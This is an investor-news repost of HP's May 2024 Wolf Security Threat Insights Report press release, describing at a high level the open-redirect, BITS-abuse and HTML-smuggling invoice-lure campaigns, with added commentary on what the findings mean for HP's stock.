HP Catches Cybercriminals ‘Cat-Phishing’ Users
HP's recent HP Wolf Security Threat Insights Report reveals how cybercriminals are using advanced techniques like open redirects, Living-off-the-Land (LotL) tactics, and invoice lures to bypass security defenses. The report highlights significant campaigns, including the exploitation of open redirect vulnerabilities and the abuse of Windows Background Intelligent Transfer Service (BITS) for malware downloads. The report underscores the effectiveness of these methods in evading detection, especially through email attachments and browser downloads, with a notable 12% of email threats bypassing gateway scanners. HP emphasizes the importance of a defense-in-depth approach, isolating and containing high-risk activities to reduce attack surfaces.
- HP Wolf Security has prevented breaches despite over 40 billion interactions with potentially malicious content.
- The report provides actionable insights on advanced cyberattack techniques, enhancing organizational defenses.
- HP highlights the necessity of a multi-layered defense strategy, demonstrating industry leadership in cybersecurity.
- The report identifies and explains the increasing sophistication of cyber threats, helping companies stay ahead of attackers.
- At least 12% of email threats bypassed one or more email gateway scanners, indicating vulnerabilities in current defenses.
- Cybercriminals are successfully using Living-off-the-Land techniques, which exploit legitimate tools to avoid detection.
- Threat actors are leveraging simple tricks like invoice lures to deceive employees, potentially leading to significant financial and data losses.
- The rise in advanced attack methods underscores a challenging environment for maintaining effective cybersecurity.
Insights
The recent findings from HP Wolf Security reveal that cyberattackers are employing increasingly sophisticated methods to infiltrate organizational systems. One key technique highlighted is the use of open redirects, where users are unwittingly redirected to malicious sites despite initially visiting a trustworthy site. This creates a significant risk as it leverages the trust users place in legitimate websites to mask malicious intent. For retail investors, it’s important to recognize that these attacks expose vulnerabilities that standard security solutions may not address. Companies like HP that offer advanced threat containment solutions demonstrate their value in this context, bolstering their competitive position in the cybersecurity market.
Additionally, the use of Living-off-the-Land (LotL) tactics by cybercriminals to abuse legitimate system tools like the Windows Background Intelligent Transfer Service (BITS) adds another layer of complexity. This tactic underscores the adaptability of cybercriminals, making it harder for detection-based tools to identify threats without generating false positives. Such findings highlight the importance of investing in advanced security solutions that can effectively isolate and contain potential threats without disrupting business operations.
Lastly, the report mentions the use of HTML smuggling in invoice lures, which is a relatively low-cost and low-effort technique but can be highly effective. This method involves disguising malware within HTML files, which are typically trusted by email scanners, to execute malicious activities once opened. This revelation is a reminder for investors that even seemingly minor and outdated attack vectors can pose significant risks if not adequately addressed by security solutions.
Overall, these insights could positively impact HP’s stock by reinforcing its role as a provider of cutting-edge cybersecurity solutions, potentially driving further adoption of their products.
The HP Wolf Security Threat Insights Report provides valuable data on the current landscape of cyber threats, which can inform investment decisions in the broader cybersecurity sector. With 12% of email threats bypassing one or more gateway scanners, it’s clear that traditional email security measures are insufficient against modern threats. This trend suggests a growing market demand for more robust, integrated security solutions that combine multiple layers of protection.
The fact that the majority of threats come from email attachments (53%) and browser downloads (25%) indicates where organizations need to focus their cybersecurity efforts. Investors should note that companies offering comprehensive email and web security solutions are well-positioned to capture market share. HP’s ability to present concrete data on threat vectors and their effectiveness in mitigating these risks positions them as a leader in the cybersecurity space.
Moreover, HP’s emphasis on threat containment—isolating and containing high-risk activities—demonstrates a proactive approach to security that addresses the limitations of detection-based systems. This approach likely appeals to enterprises seeking to minimize their attack surface and operational disruptions. As the frequency and sophistication of cyberattacks increase, the demand for such advanced security solutions is expected to rise, which could be beneficial for HP’s market position and financial performance.
Invoice lures were the weapon of choice last quarter, while threat actors used Living-off-the-Land techniques to evade detection
PALO ALTO, Calif., May 16, 2024 (GLOBE NEWSWIRE) -- HP Inc. (NYSE: HPQ) today issued its quarterly HP Wolf Security Threat Insights Report, showing attackers are relying on open redirects, overdue invoice lures, and Living-off-the-Land (LotL) techniques to sneak past defences. The report provides an analysis of real-world cyberattacks, helping organizations to keep up with the latest techniques cybercriminals use to evade detection and breach PCs in the fast-changing cybercrime landscape.
Based on data from millions of endpoints running HP Wolf Security, notable campaigns identified by HP threat researchers include:
- Attackers using open redirects to ‘Cat-Phish’ users: In an advanced WikiLoader campaign, attackers exploited open redirect vulnerabilities within websites to circumvent detection. Users were directed to trustworthy sites, often through open redirect vulnerabilities in ad embeddings. They were then redirected to malicious sites – making it almost impossible for users to detect the switch.
- Living-off-the-BITS: Several campaigns abused the Windows Background Intelligent Transfer Service (BITS) – a legitimate mechanism used by programmers and system administrators to download or upload files to web servers and file shares. This LotL technique helped attackers remain undetected by using BITS to download the malicious files.
- Fake invoices leading to HTML smuggling attacks: HP identified threat actors hiding malware inside HTML files posing as delivery invoices which, once opened in a web browser, unleash a chain of events deploying open-source malware, AsyncRAT. Interestingly, the attackers paid little attention to the design of the lure, suggesting the attack was created with only a small investment of time and resources.
Patrick Schläpfer, Principal Threat Researcher in the HP Wolf Security threat research team, comments:
"Targeting companies with invoice lures is one of the oldest tricks in the book, but it can still be very effective and hence lucrative. Employees working in finance departments are used to receiving invoices via email, so they are more likely to open them. If successful, attackers can quickly monetize their access by selling it to cybercriminal brokers, or by deploying ransomware.”
By isolating threats that have evaded detection-based tools – but still allowing malware to detonate safely – HP Wolf Security has specific insight into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on over 40 billion email attachments, web pages, and downloaded files with no reported breaches.
The report details how cybercriminals continue to diversify attack methods to bypass security policies and detection tools. Other findings include:
- At least
12% of email threats identified by HP Sure Click* bypassed one or more email gateway scanners. - The top threat vectors in Q1 were email attachments (
53% ), downloads from browsers (25% ) and other infection vectors, such as removable storage – like USB thumb drives – and file shares (22% ). - This quarter, at least
65% of document threats relied on an exploit to execute code, rather than macros.
Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., comments:
"Living-off-the-Land techniques expose the fundamental flaws of relying on detection alone. Because attackers are using legitimate tools, it’s difficult to spot threats without throwing up a lot of disruptive false positives. Threat containment provides protection even when detection fails, preventing malware from exfiltrating or destroying user data or credentials, and preventing attacker persistence. This is why organizations should take a defence-in-depth approach to security, isolating and containing high-risk activities to reduce their attack surface."
HP Wolf Security** runs risky tasks in isolated, hardware-enforced disposable virtual machines running on the endpoint to protect users, without impacting their productivity. It also captures detailed traces of attempted infections. HP’s application isolation technology mitigates threats that slip past other security tools and provides unique insights into intrusion techniques and threat actor behavior.
About the data
This data was gathered from consenting HP Wolf Security customers from January-March 2024.
About HP
HP Inc. (NYSE: HPQ) is a global technology leader and creator of solutions that enable people to bring their ideas to life and connect to the things that matter most. Operating in more than 170 countries, HP delivers a wide range of innovative and sustainable devices, services and subscriptions for personal computing, printing, 3D printing, hybrid work, gaming, and more. For more information, please visit: http://www.hp.com.
About HP Wolf Security
HP Wolf Security is world class endpoint security. HP’s portfolio of hardware-enforced security and endpoint-focused security services are designed to help organizations safeguard PCs, printers, and people from circling cyber predators. HP Wolf Security provides comprehensive endpoint protection and resiliency that starts at the hardware level and extends across software and services. Visit https://hp.com/wolf.
*HP Sure Click Enterprise is sold separately. Supported attachments include Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. For full system requirements, please visit HP need hyperlink to HP Sure Access Enterprise and HP Sure Click Enterprise system requirements at: https://enterprisesecurity.hp.com/s/article/System-Requirements-for-HP-Sure-Access-Enterprise
**HP Wolf Security for Business requires Windows 10 or 11 Pro and higher, includes various HP security features and is available on HP Pro, Elite, RPOS and Workstation products. See product details for included security features.
FAQ
What are the key findings of HPQ's Wolf Security Threat Insights Report?
How are attackers using open redirects according to the HPQ report?
What is Living-off-the-Land (LotL) as discussed in HPQ's report?
How effective are HP Wolf Security measures according to the latest report?
What are the top threat vectors identified in HPQ's latest cybersecurity report?
